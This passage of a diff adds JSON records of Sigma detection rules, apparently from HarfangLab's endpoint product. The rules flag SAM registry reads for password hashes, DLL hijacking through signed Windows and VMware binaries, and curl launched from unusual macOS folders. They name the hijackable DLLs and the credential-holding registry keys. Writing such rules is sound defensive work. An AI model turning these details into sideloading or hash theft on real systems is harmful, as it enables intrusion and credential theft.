null, + "rule_tactic_tags": [ + "attack.command_and_control", + "attack.defense_evasion" + ], + "rule_technique_tags": [ + "attack.t1055", + "attack.t1071.001", + "attack.t1571" + ], + "warnings": null, + "errors": null, + "declared_in": null, + "source": "0950c540-b155-4054-9b93-8fb2888de6ed" +} +{ + "id": "2d774838-fe3c-4704-a1c2-8e1287b6b0ee", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "alert", + "effective_state": "alert", + "rule_effective_level": "high", + "rule_effective_confidence": "strong", + "alert_count": 0, + "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", + "rule_level_overridden": false, + "whitelist_count": 0, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "endpoint_detection": true, + "backend_detection": false, + "origin_stack": { + "id": "b8e2fe4fc90e4d08", + "name": null, + "is_current": false, + "is_supervisor": true, + "is_tenant": false + }, + "tenant": "b8e2fe4fc90e4d08", + "rule_is_depended_on": [], + "rule_type": "sigma_rule", + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:34.095725Z", + "creation_date": "2026-03-23T11:45:34.095728Z", + "enabled": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:34.095732Z", + "rule_level": "high", + "rule_confidence": "strong", + "rule_confidence_override": null, + "references": [ + "https://github.com/matteodalgrande/windows-hash-crack-python37/blob/master/README.md", + "https://attack.mitre.org/techniques/T1003/002/" + ], + "name": "t1003_002_susp_sam_database_accessed.yml", + "content": "title: SAM Database Read from Registry via Samdump\nid: 2d774838-fe3c-4704-a1c2-8e1287b6b0ee\ndescription: |\n Detects a suspicious read operation on registry keys storing Windows account parameters.\n Adversaries may extract user information stored in SAM database to retrieve user's password hashes.\n It is recommended to check whether the process accessing the 
registry keys has legitimate reasons to do it.\nreferences:\n - https://github.com/matteodalgrande/windows-hash-crack-python37/blob/master/README.md\n - https://attack.mitre.org/techniques/T1003/002/\ndate: 2024/04/02\nmodified: 2025/04/15\nauthor: HarfangLab\ntags:\n - attack.credential_access\n - attack.t1003.002\n - attack.discovery\n - attack.t1012\n - classification.Windows.Source.Registry\n - classification.Windows.Behavior.CredentialAccess\nlogsource:\n product: windows\n category: registry_event\ndetection:\n selection:\n EventType: 'ReadValue'\n TargetObject:\n - 'HKLM\\SAM\\SAM\\Domains\\Account\\Users\\\\*\\F'\n - 'HKLM\\SAM\\SAM\\Domains\\Account\\Users\\\\*\\V'\n Image|contains: '?'\n\n filter_lsass:\n - Image:\n - '?:\\Windows\\System32\\lsass.exe'\n - '\\Device\\VhdHardDisk{????????-????-????-????-????????????}\\Windows\\System32\\lsass.exe'\n - '\\Device\\HarddiskVolume*\\Windows\\System32\\lsass.exe'\n - ProcessImage:\n - '?:\\Windows\\System32\\lsass.exe'\n - '\\Device\\VhdHardDisk{????????-????-????-????-????????????}\\Windows\\System32\\lsass.exe'\n - '\\Device\\HarddiskVolume*\\Windows\\System32\\lsass.exe'\n\n exclusion_programfiles:\n ProcessImage|startswith:\n - '?:\\Program Files\\'\n - '?:\\Program Files (x86)\\'\n ProcessSigned: 'true'\n\n exclusion_remote_registry:\n ProcessCommandLine:\n - '?:\\WINDOWS\\system32\\svchost.exe -k localService -p -s RemoteRegistry'\n - '?:\\Windows\\system32\\svchost.exe -k LocalService'\n - '?:\\Windows\\system32\\svchost.exe -k regsvc'\n ProcessSigned: 'true'\n ProcessSignature:\n - 'Microsoft Windows Publisher'\n - 'Microsoft Windows'\n\n condition: selection and not 1 of filter_* and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n", + "block_on_agent": false, + "quarantine_on_agent": false, + "rule_level_override": null, + "rule_id": "2d774838-fe3c-4704-a1c2-8e1287b6b0ee", + "rule_name": "SAM Database Read from Registry via Samdump", + "rule_description": "Detects a suspicious read operation on 
registry keys storing Windows account parameters.\nAdversaries may extract user information stored in SAM database to retrieve user's password hashes.\nIt is recommended to check whether the process accessing the registry keys has legitimate reasons to do it.\n", + "rule_creation_date": "2024-04-02", + "rule_modified_date": "2025-04-15", + "rule_os": "windows", + "rule_status": null, + "rule_tactic_tags": [ + "attack.credential_access", + "attack.discovery" + ], + "rule_technique_tags": [ + "attack.t1003.002", + "attack.t1012" + ], + "warnings": null, + "errors": null, + "declared_in": null, + "source": "0950c540-b155-4054-9b93-8fb2888de6ed" +} +{ + "id": "2d93119f-c45c-4f21-b353-cd28185a6bcb", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "alert", + "effective_state": "alert", + "rule_effective_level": "high", + "rule_effective_confidence": "strong", + "alert_count": 0, + "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", + "rule_level_overridden": false, + "whitelist_count": 0, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "endpoint_detection": true, + "backend_detection": false, + "origin_stack": { + "id": "b8e2fe4fc90e4d08", + "name": null, + "is_current": false, + "is_supervisor": true, + "is_tenant": false + }, + "tenant": "b8e2fe4fc90e4d08", + "rule_is_depended_on": [], + "rule_type": "sigma_rule", + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:34.093883Z", + "creation_date": "2026-03-23T11:45:34.093885Z", + "enabled": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:34.093889Z", + "rule_level": "high", + "rule_confidence": "strong", + "rule_confidence_override": null, + "references": [ + "https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows", + "https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/", + "https://attack.mitre.org/techniques/T1574/001/" + ], + "name": 
"t1574_001_dll_hijacking_quser.yml", + "content": "title: DLL Hijacking via quser.exe\nid: 2d93119f-c45c-4f21-b353-cd28185a6bcb\ndescription: |\n Detects potential Windows DLL Hijacking via quser.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'quser.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\logoncli.dll'\n - '\\netutils.dll'\n - '\\samcli.dll'\n - '\\srvcli.dll'\n - '\\UTILDLL.dll'\n - '\\WINSTA.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n", + "block_on_agent": false, + 
"quarantine_on_agent": false, + "rule_level_override": null, + "rule_id": "2d93119f-c45c-4f21-b353-cd28185a6bcb", + "rule_name": "DLL Hijacking via quser.exe", + "rule_description": "Detects potential Windows DLL Hijacking via quser.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n", + "rule_creation_date": "2021-12-10", + "rule_modified_date": "2025-07-11", + "rule_os": "windows", + "rule_status": null, + "rule_tactic_tags": [ + "attack.defense_evasion", + "attack.persistence", + "attack.privilege_escalation" + ], + "rule_technique_tags": [ + "attack.t1574.001" + ], + "warnings": null, + "errors": null, + "declared_in": null, + "source": "0950c540-b155-4054-9b93-8fb2888de6ed" +} +{ + "id": "2da166af-7d44-4ca3-a8d3-3210b643d807", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "alert", + "effective_state": "alert", + "rule_effective_level": "high", + "rule_effective_confidence": "strong", + "alert_count": 0, + "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", + "rule_level_overridden": false, + "whitelist_count": 0, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "endpoint_detection": true, + "backend_detection": false, + "origin_stack": { + "id": "b8e2fe4fc90e4d08", + "name": null, + "is_current": false, + "is_supervisor": true, + "is_tenant": false + }, + "tenant": "b8e2fe4fc90e4d08", + "rule_is_depended_on": [], + "rule_type": "sigma_rule", + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:34.618655Z", + 
"creation_date": "2026-03-23T11:45:34.618657Z", + "enabled": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:34.618662Z", + "rule_level": "high", + "rule_confidence": "strong", + "rule_confidence_override": null, + "references": [ + "https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows", + "https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/", + "https://www.sentinelone.com/labs/lockbit-ransomware-side-loads-cobalt-strike-beacon-with-legitimate-vmware-utility/", + "https://attack.mitre.org/techniques/T1574/001/" + ], + "name": "t1574_001_dll_hijacking_vmwarexferlogs.yml", + "content": "title: DLL Hijacking via VMwareXferlogs.exe\nid: 2da166af-7d44-4ca3-a8d3-3210b643d807\ndescription: |\n Detects potential Windows DLL Hijacking via VMwareXferlogs.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying the legitimate VMwareXferlogs executable to another location and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://www.sentinelone.com/labs/lockbit-ransomware-side-loads-cobalt-strike-beacon-with-legitimate-vmware-utility/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/08/02\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n 
ProcessOriginalFileName: 'xferlogs.exe'\n ProcessSignature: 'VMWare, Inc.'\n ImageLoaded|endswith: '\\glib-2.0.dll'\n\n filter_legitimate_image:\n Image|startswith: '?:\\Program Files\\VMware\\VMware Tools\\'\n\n filter_legitimate_imageloaded:\n ImageLoaded|startswith: '?:\\Program Files\\VMware\\VMware Tools\\'\n\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'VMware, Inc.'\n\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n", + "block_on_agent": false, + "quarantine_on_agent": false, + "rule_level_override": null, + "rule_id": "2da166af-7d44-4ca3-a8d3-3210b643d807", + "rule_name": "DLL Hijacking via VMwareXferlogs.exe", + "rule_description": "Detects potential Windows DLL Hijacking via VMwareXferlogs.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying the legitimate VMwareXferlogs executable to another location and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n", + "rule_creation_date": "2022-08-02", + "rule_modified_date": "2025-07-11", + "rule_os": "windows", + "rule_status": null, + "rule_tactic_tags": [ + "attack.defense_evasion", + "attack.persistence", + "attack.privilege_escalation" + ], + "rule_technique_tags": [ + "attack.t1574.001" + ], + "warnings": null, + "errors": null, + "declared_in": null, + "source": "0950c540-b155-4054-9b93-8fb2888de6ed" +} +{ + "id": "2da5035b-dc02-4700-8b81-859d0243e461", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "alert", + "effective_state": "alert", + "rule_effective_level": "high", + "rule_effective_confidence": "strong", + "alert_count": 0, + "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", + 
"rule_level_overridden": false, + "whitelist_count": 0, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "endpoint_detection": true, + "backend_detection": false, + "origin_stack": { + "id": "b8e2fe4fc90e4d08", + "name": null, + "is_current": false, + "is_supervisor": true, + "is_tenant": false + }, + "tenant": "b8e2fe4fc90e4d08", + "rule_is_depended_on": [], + "rule_type": "sigma_rule", + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:34.594519Z", + "creation_date": "2026-03-23T11:45:34.594522Z", + "enabled": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:34.594529Z", + "rule_level": "high", + "rule_confidence": "strong", + "rule_confidence_override": null, + "references": [ + "https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows", + "https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/", + "https://attack.mitre.org/techniques/T1574/001/" + ], + "name": "t1574_001_dll_hijacking_dmcfghost.yml", + "content": "title: DLL Hijacking via dmcfghost.exe\nid: 2da5035b-dc02-4700-8b81-859d0243e461\ndescription: |\n Detects potential Windows DLL Hijacking via dmcfghost.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - 
attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'dmcfghost.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\DMCmnUtils.dll'\n - '\\DMPushProxy.dll'\n - '\\dmxmlhelputils.dll'\n - '\\dsclient.dll'\n - '\\iri.dll'\n - '\\omadmapi.dll'\n - '\\XmlLite.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n", + "block_on_agent": false, + "quarantine_on_agent": false, + "rule_level_override": null, + "rule_id": "2da5035b-dc02-4700-8b81-859d0243e461", + "rule_name": "DLL Hijacking via dmcfghost.exe", + "rule_description": "Detects potential Windows DLL Hijacking via dmcfghost.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n", + "rule_creation_date": "2021-12-10", + "rule_modified_date": "2025-07-11", + "rule_os": "windows", + "rule_status": null, + "rule_tactic_tags": [ + "attack.defense_evasion", + "attack.persistence", + "attack.privilege_escalation" + ], + 
"rule_technique_tags": [ + "attack.t1574.001" + ], + "warnings": null, + "errors": null, + "declared_in": null, + "source": "0950c540-b155-4054-9b93-8fb2888de6ed" +} +{ + "id": "2dd18b86-68a7-4c00-9cd0-36f3ad10d60e", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "alert", + "effective_state": "alert", + "rule_effective_level": "high", + "rule_effective_confidence": "strong", + "alert_count": 0, + "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", + "rule_level_overridden": false, + "whitelist_count": 0, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "endpoint_detection": true, + "backend_detection": false, + "origin_stack": { + "id": "b8e2fe4fc90e4d08", + "name": null, + "is_current": false, + "is_supervisor": true, + "is_tenant": false + }, + "tenant": "b8e2fe4fc90e4d08", + "rule_is_depended_on": [], + "rule_type": "sigma_rule", + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:34.617713Z", + "creation_date": "2026-03-23T11:45:34.617715Z", + "enabled": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:34.617719Z", + "rule_level": "high", + "rule_confidence": "strong", + "rule_confidence_override": null, + "references": [ + "https://www.jamf.com/blog/bluenoroff-apt-targets-macos-rustbucket-malware/", + "https://attack.mitre.org/techniques/T1105/" + ], + "name": "t1105_curl_susp_parent.yml", + "content": "title: Curl Executed in a Suspicious Execution Context\nid: 2dd18b86-68a7-4c00-9cd0-36f3ad10d60e\ndescription: |\n Detects the curl command being executed by a parent process located in an uncommon folder.\n Attackers may execute curl to download additional payloads.\n It is recommended to investigate files that were downloaded, and to analyze the process that executed the curl command to determine whether this action was legitimate.\nreferences:\n - 
https://www.jamf.com/blog/bluenoroff-apt-targets-macos-rustbucket-malware/\n - https://attack.mitre.org/techniques/T1105/\ndate: 2024/07/22\nmodified: 2025/04/11\nauthor: HarfangLab\ntags:\n - attack.command_and_control\n - attack.t1105\n - classification.macOS.Source.ProcessCreation\n - classification.macOS.Behavior.CommandAndControl\n - classification.macOS.Behavior.FileDownload\n - classification.macOS.Behavior.Exfiltration\nlogsource:\n product: macos\n category: process_creation\ndetection:\n selection:\n Image|endswith: '/curl'\n\n selection_susp_ancestors:\n ProcessAncestors|contains:\n # folder\n - '/users/shared/'\n - '/private/tmp/'\n - '/private/var/tmp/'\n - '/private/etc/'\n - '/private/var/root/'\n - '/Volumes/'\n\n filter_shell:\n ParentImage|endswith:\n - '/zsh'\n - '/sh'\n - '/bash'\n\n exclusion_adode:\n ProcessParentImage|endswith: '/AcroInstallAlert.app/Contents/MacOS/AcroInstallAlert'\n ProcessCommandLine|startswith: '/usr/bin/curl -H Cache-Control: no-cache https://acroipm2.adobe.com/'\n\n condition: selection and 1 of selection_* and not 1 of filter_* and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n", + "block_on_agent": false, + "quarantine_on_agent": false, + "rule_level_override": null, + "rule_id": "2dd18b86-68a7-4c00-9cd0-36f3ad10d60e", + "rule_name": "Curl Executed in a Suspicious Execution Context", + "rule_description": "Detects the curl command being executed by a parent process located in an uncommon folder.\nAttackers may execute curl to download additional payloads.\nIt is recommended to investigate files that were downloaded, and to analyze the process that executed the curl command to determine whether this action was legitimate.\n", + "rule_creation_date": "2024-07-22", + "rule_modified_date": "2025-04-11", + "rule_os": "macos", + "rule_status": null, + "rule_tactic_tags": [ + "attack.command_and_control" + ], + "rule_technique_tags": [ + "attack.t1105" + ], + "warnings": null, + "errors": null, + "declared_in": 
null, + "source": "0950c540-b155-4054-9b93-8fb2888de6ed" +} +{ + "id": "2de657e9-b90e-455c-921d-6dc97f347601", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "alert", + "effective_state": "alert", + "rule_effective_level": "high", + "rule_effective_confidence": "strong", + "alert_count": 0, + "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", + "rule_level_overridden": false, + "whitelist_count": 0, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "endpoint_detection": true, + "backend_detection": false, + "origin_stack": { + "id": "b8e2fe4fc90e4d08", + "name": null, + "is_current": false, + "is_supervisor": true, + "is_tenant": false + }, + "tenant": "b8e2fe4fc90e4d08", + "rule_is_depended_on": [], + "rule_type": "sigma_rule", + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:34.618947Z", + "creation_date": "2026-03-23T11:45:34.618949Z", + "enabled": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:34.618953Z", + "rule_level": "high", + "rule_confidence": "strong", + "rule_confidence_override": null, + "references": [ + "https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows", + "https://github.com/xforcered/WFH", + "https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/", + "https://attack.mitre.org/techniques/T1574/001/" + ], + "name": "t1574_001_dll_hijacking_slui.yml", + "content": "title: DLL Hijacking via slui.exe\nid: 2de657e9-b90e-455c-921d-6dc97f347601\ndescription: |\n Detects potential Windows DLL Hijacking via slui.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded 
library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://github.com/xforcered/WFH\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'slui.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\CLDAPI.dll'\n - '\\CRYPTBASE.DLL'\n - '\\edputil.dll'\n - '\\FLTLIB.DLL'\n - '\\iphlpapi.dll'\n - '\\ndfapi.dll'\n - '\\PROPSYS.dll'\n - '\\sppc.dll'\n - '\\wdi.dll'\n - '\\WINBRAND.dll'\n - '\\WTSAPI32.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n\n filter_docker:\n Image: '\\Device\\VhdHardDisk{????????-????-????-????-????????????}\\Windows\\System32\\slui.exe'\n ImageLoaded: '*\\windowsfilter\\\\*\\Files\\Windows\\System32\\\\*.dll'\n\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
+ "block_on_agent": false,
+ "quarantine_on_agent": false,
+ "rule_level_override": null,
+ "rule_id": "2de657e9-b90e-455c-921d-6dc97f347601",
+ "rule_name": "DLL Hijacking via slui.exe",
+ "rule_description": "Detects potential Windows DLL Hijacking via slui.exe.\nDLL hijacking takes advantage of the 
default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
+ "rule_creation_date": "2021-12-10",
+ "rule_modified_date": "2025-07-11",
+ "rule_os": "windows",
+ "rule_status": null,
+ "rule_tactic_tags": [
+ "attack.defense_evasion",
+ "attack.persistence",
+ "attack.privilege_escalation"
+ ],
+ "rule_technique_tags": [
+ "attack.t1574.001"
+ ],
+ "warnings": null,
+ "errors": null,
+ "declared_in": null,
+ "source": "0950c540-b155-4054-9b93-8fb2888de6ed"
+}
+{
+ "id": "2e0c666b-c55c-45ac-b889-dd35b1dd206c",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "alert",
+ "effective_state": "alert",
+ "rule_effective_level": "high",
+ "rule_effective_confidence": "strong",
+ "alert_count": 0,
+ "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
+ "rule_level_overridden": false,
+ "whitelist_count": 0,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "endpoint_detection": true,
+ "backend_detection": false,
+ "origin_stack": {
+ "id": "b8e2fe4fc90e4d08",
+ "name": null,
+ "is_current": false,
+ "is_supervisor": true,
+ "is_tenant": false
+ },
+ "tenant": "b8e2fe4fc90e4d08",
+ "rule_is_depended_on": [],
+ "rule_type": "sigma_rule",
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:34.080686Z",
+ "creation_date": "2026-03-23T11:45:34.080688Z",
+ "enabled": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:34.080692Z",
+ "rule_level": "high",
+ "rule_confidence": "strong",
+ "rule_confidence_override": null,
+ "references": [
+ 
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows", + "https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/", + "https://attack.mitre.org/techniques/T1574/001/" + ], + "name": "t1574_001_dll_hijacking_mshta.yml", + "content": "title: DLL Hijacking via mshta.exe\nid: 2e0c666b-c55c-45ac-b889-dd35b1dd206c\ndescription: |\n Detects potential Windows DLL Hijacking via mshta.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'mshta.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\CRYPTBASE.DLL'\n - '\\netutils.dll'\n - '\\srpapi.dll'\n - '\\SspiCli.dll'\n - '\\WINHTTP.dll'\n - '\\wkscli.dll'\n - '\\WLDP.DLL'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - 
'?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
+ "block_on_agent": false,
+ "quarantine_on_agent": false,
+ "rule_level_override": null,
+ "rule_id": "2e0c666b-c55c-45ac-b889-dd35b1dd206c",
+ "rule_name": "DLL Hijacking via mshta.exe",
+ "rule_description": "Detects potential Windows DLL Hijacking via mshta.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
+ "rule_creation_date": "2021-12-10",
+ "rule_modified_date": "2025-07-11",
+ "rule_os": "windows",
+ "rule_status": null,
+ "rule_tactic_tags": [
+ "attack.defense_evasion",
+ "attack.persistence",
+ "attack.privilege_escalation"
+ ],
+ "rule_technique_tags": [
+ "attack.t1574.001"
+ ],
+ "warnings": null,
+ "errors": null,
+ "declared_in": null,
+ "source": "0950c540-b155-4054-9b93-8fb2888de6ed"
+}
+{
+ "id": "2e473606-203c-47b8-8899-647af707c98a",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "alert",
+ "effective_state": "alert",
+ "rule_effective_level": "high",
+ "rule_effective_confidence": "strong",
+ "alert_count": 0,
+ "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
+ "rule_level_overridden": false,
+ "whitelist_count": 0,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "endpoint_detection": true,
+ "backend_detection": false,
+ "origin_stack": {
+ "id": "b8e2fe4fc90e4d08",
+ "name": null,
+ "is_current": false,
+ "is_supervisor": 
true,
+ "is_tenant": false
+ },
+ "tenant": "b8e2fe4fc90e4d08",
+ "rule_is_depended_on": [],
+ "rule_type": "sigma_rule",
